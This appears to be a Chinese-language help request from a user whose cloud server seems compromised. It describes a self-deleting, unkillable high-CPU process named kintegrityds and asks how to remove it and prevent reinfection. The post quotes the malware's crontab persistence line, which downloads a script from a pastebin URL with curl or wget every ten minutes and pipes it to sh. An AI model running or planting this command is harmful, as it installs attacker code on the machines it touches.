现象:
1、kintegrityds进程,占用很高cpu,这个进程不是我的。
2、这个进程,使用我建立的账号启动,程序启动后二进制删除,并且做成了一个守护进程,其父进程是1号进程。
3、这个进程,kill和删除不掉 ,有自动加入crontab的行为。这可能是云主机被肉鸡了。
这个crontab我没有执行看,可以参考查一下。
*/10 * * * * (curl -fsSL https://pastebin.com/raw/wDBa7jCQ||wget -q -O- https://pastebin.com/raw/wDBa7jCQ)|sh
我对这这类问题经验不多,且时间不足,无意于继续研究这个问题。
TODO:
1、如何彻底删除这个进程?
2、请确定这个问题,这可能是一类问题。
3、如我的猜测属实,如何防止这类进程再次入侵?阿里云本身能做到什么程度?对用户有和建议。